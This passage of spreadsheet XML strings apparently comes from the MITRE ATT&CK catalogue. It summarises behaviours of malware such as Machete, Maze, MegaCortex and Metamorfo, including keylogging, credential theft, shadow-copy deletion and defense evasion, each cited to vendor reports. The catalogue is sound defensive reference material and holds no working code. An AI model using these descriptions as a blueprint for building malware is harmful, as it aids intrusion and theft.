  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) has XOR-encrypted and stored contents of SMS messages that matched its target list. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor.(Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>After checking for the existence of two files, keyword_parm.txt and parm.txt, [MESSAGETAP](https://attack.mitre.org/software/S0443) XOR decodes and read the contents of the files. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>Once loaded into memory, [MESSAGETAP](https://attack.mitre.org/software/S0443) deletes the keyword_parm.txt and parm.txt configuration files from disk. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) checks for the existence of two configuration files (keyword_parm.txt and parm.txt) and attempts to read the files every 30 seconds.(Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) stored targeted SMS messages that matched its target list in CSV files on the compromised system.(Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata.  (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>After loading the keyword and phone data files, [MESSAGETAP](https://attack.mitre.org/software/S0443) begins monitoring all network connections to and from the victim server. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to schedule remote AT jobs.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to delete local files.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about users on remote hosts.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to scan for open ports on hosts in a connected network.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about shares on remote hosts.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about groups.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to identify remote hosts on connected networks.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about the OS.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) uses the command-line interface.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) can record the sounds from microphones on a computer.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) can steal clipboard contents.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) deletes any temporary files it creates(Citation: alientvault macspy)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) stores itself in &lt;code&gt;~/Library/.DS_Stores/&lt;/code&gt; (Citation: alientvault macspy)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) captures keystrokes.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) persists via a Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) uses Tor for command and control.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) can capture screenshots of the desktop over multiple monitors.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) uses HTTP for command and control.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) saves the window names.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) stores zipped files with profile data from installed web browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409)'s collected data is encrypted with AES before exfiltration.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used TLS-encrypted FTP to exfiltrate data.(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) captures audio from the computer’s microphone.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409)’s collected files are exfiltrated automatically to remote servers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) retrieves the user profile data (e.g., browsers) from Chrome and Firefox browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) hijacks the clipboard data by creating an overlapped window that listens to keyboard events.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) collects stored credentials from several web browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) searches the File system for files of interest.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) can find, encrypt, and upload files from fixed and removable drives.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409)’s downloaded data is decrypted using AES.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409)'s collected data is exfiltrated over the same channel used for C2.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has a feature to copy files from every drive onto a removable drive in a hidden folder.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has sent data over HTTP if FTP failed, and has also used a fallback server.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">Once a file is uploaded, [Machete](https://attack.mitre.org/software/S0409) will delete it from the machine.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) uses FTP for Command &amp; Control.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) produces file listings in order to search for files to be exfiltrated.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has the capability to exfiltrate stolen data to a hidden folder on a removable drive.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Machete](https://attack.mitre.org/software/S0409) can download additional files for execution on the victim’s machine.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) logs keystrokes from the victim’s machine.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) stores files and logs in a folder on the local drive.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) renamed task names to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python tasks.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used pyobfuscate, zlib compression, and base64 encoding for obfuscation. [Machete](https://attack.mitre.org/groups/G0095) has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) detects the insertion of new devices by listening for the WM_DEVICECHANGE window message.(Citation: ESET Machete July 2019)  </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has scanned and looked for cryptographic keys and certificate file extensions.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has a component to check for running processes to look for web browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) is written in Python and is used in conjunction with additional Python scripts.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) used the startup folder for persistence.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t>The different components of [Machete](https://attack.mitre.org/software/S0409) are executed by Windows Task Scheduler.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) sends stolen data to the C2 server every 10 minutes.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) captures screenshots.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has been packed with NSIS.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used base64 encoding.(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used AES to exfiltrate documents.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) collects the hostname of the target computer.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) collects the MAC address of the target computer and other network configuration information.(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) uses the &lt;code&gt;netsh wlan show networks mode=bssid&lt;/code&gt; and &lt;code&gt;netsh wlan show interfaces&lt;/code&gt; commands to list all nearby WiFi networks and connected interfaces.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) takes photos from the computer’s web camera.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) uses HTTP for Command &amp; Control.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[MailSniper](https://attack.mitre.org/software/S0413) can be used to obtain account names from Exchange and Office 365 using the &lt;code&gt;Get-GlobalAddressList&lt;/code&gt; cmdlet.(Citation: Black Hills Attacking Exchange MailSniper, 2016)</t>
  </si>
  <si>
    <t>[MailSniper](https://attack.mitre.org/software/S0413) can be used for password spraying against Exchange and Office 365.(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>[MailSniper](https://attack.mitre.org/software/S0413) can be used for searching through email in Exchange and Office 365 environments.(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of providing Meterpreter shell access.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of stealing Outlook passwords.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) uses DNS for C2.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) uses reflective DLL injection to inject the malicious library and execute the RAT.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of keylogging.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) obfuscates API function names using a substitute cipher combined with Base64 encoding.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) can establish persistence by adding Registry Run keys.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) can establish persistence by adding a Scheduled Task named "Microsoft Boost Kernel Optimization".(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of performing screen captures.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. [Maze](https://attack.mitre.org/software/S0449) has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.(Citation: FireEye Maze May 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg.(Citation: McAfee Maze March 2020) It has also disabled Windows Defender's Real-Time Monitoring feature and attempted to disable endpoint protection services.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has forged POST strings with a random choice from a list of possibilities including "forum", "php", "view", etc. while making connection with the C2, hindering detection efforts.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has injected the malware DLL into a target process.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has used the “Wow64RevertWow64FsRedirection” function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) operators have created scheduled tasks masquerading as "Windows Update Security", "Windows Update Security Patches", and "Google Chrome Security Update" designed to launch the ransomware.(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has delivered components for its ransomware attacks using MSI files, some of which have been executed from the command-line using &lt;code&gt;msiexec&lt;/code&gt;.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has decrypted strings and other important information during the encryption process. [Maze](https://attack.mitre.org/software/S0449) also calls certain functions dynamically to hinder analysis.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has gathered all of the running system processes.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has created a file named "startup_vrun.bat" in the Startup folder of a virtual machine to establish persistence.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) operators have used VirtualBox and a Windows 7 virtual machine to run the ransomware; the virtual machine's configuration file mapped the shared network drives of the target company, presumably so [Maze](https://attack.mitre.org/software/S0449) can encrypt files on the shared drives as well as the local machine.(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has created scheduled tasks using name variants such as "Windows Update Security", "Windows Update Security Patches", and "Google Chrome Security Update", to launch [Maze](https://attack.mitre.org/software/S0449) at a specific time.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has stopped SQL services to ensure it can encrypt any database.(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has checked the language of the infected system using the "GetUSerDefaultUILanguage" function.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has used the "WNetOpenEnumW", "WNetEnumResourceW”, “WNetCloseEnum” and “WNetAddConnection2W” functions to enumerate the network resources on the infected machine.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has issued a shutdown command on a victim machine that, upon reboot, will run the ransomware within a VM.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has communicated to hard-coded IP addresses via HTTP.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>The [Maze](https://attack.mitre.org/software/S0449) encryption process has used batch scripts with various commands.(Citation: FireEye Maze May 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to send the compromised user's account name and hostname within a URL to C2.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to upload and download files to and from a compromised host.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has been downloaded as a file named lsass.exe, which matches the legitimate Windows file.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) uses a python-based payload.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use base16 encoded strings in C2.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to identify the username and hostname on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use HTTP in communication with C2.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to run commands on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) can enable &lt;code&gt;SeDebugPrivilege&lt;/code&gt; and adjust token privileges.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has changed user account passwords and logged users off the system.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>Code Signing Certificates</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used code signing certificates issued to fake companies to bypass security controls.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process.(Citation: IBM MegaCortex)(Citation: mbed-crypto)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used a Base64 key to decode its components.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) was used to kill endpoint security processes.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>Disk Content Wipe</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) can wipe deleted data from all drives using &lt;code&gt;cipher.exe&lt;/code&gt;.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) loads &lt;code&gt;injecthelper.dll&lt;/code&gt; into a newly created &lt;code&gt;rundll32.exe&lt;/code&gt; process.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) can parse the available drives and directories to determine which files to encrypt.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has deleted volume shadow copies using &lt;code&gt;vssadmin.exe&lt;/code&gt;.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has added entries to the Registry for ransom contact information.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>After escalating privileges, [MegaCortex](https://attack.mitre.org/software/S0576) calls &lt;code&gt;TerminateProcess()&lt;/code&gt;, &lt;code&gt;CreateRemoteThread&lt;/code&gt;, and other Win32 APIs.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used &lt;code&gt;rundll32.exe&lt;/code&gt; to load a DLL for file encryption.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) can stop and disable services on the system.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) has checked the number of CPUs in the system to avoid being run in a sandbox or emulator.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) has used &lt;code&gt;.cmd&lt;/code&gt; scripts on the victim's system.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can monitor content saved to the clipboard.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has been distributed through an AutoIt loader script.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has the ability to steal credentials from web browsers.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can use DLL hijacking to bypass security controls.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has the ability to download additional files to a compromised host.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has gained execution through victims opening malicious links.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can monitor the victim's browser for online banking sessions and display an overlay window to manipulate the session in the background.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can use MSI files with embedded VBScript for execution.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has been packed with VMProtect and Themida.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has been spread through malicious links embedded in e-mails.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can use VBS scripts to execute malicious DLLs.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) can enumerate all windows on the victim’s machine.(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455)'s C2 communication has been encrypted using OpenSSL.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a function to receive data from the system clipboard.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has digitally signed executables using AVAST Software certificates.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has side-loaded its malicious DLL file.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Upon execution, [Metamorfo](https://attack.mitre.org/software/S0455) has unzipped itself after being downloaded to the system.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a function to kill processes associated with defenses and can prevent certain processes from launching.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has injected a malicious DLL into the Windows Media Player process (wmplayer.exe).(Citation: Medium Metamorfo Apr 2020)</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has deleted itself from the system after execution.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has searched the Program Files directories for specific folders and has searched for strings related to its mutexes.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has displayed fake forms on top of banking sites to intercept credentials from victims.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has hidden its GUI using the ShowWindow() WINAPI call.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a command to delete a Registry key it uses, &lt;code&gt;\Software\Microsoft\Internet Explorer\notes&lt;/code&gt;.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has used MSI to download files for execution.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) includes payloads written in JavaScript.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a command to launch a keylogger on the victim’s machine.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
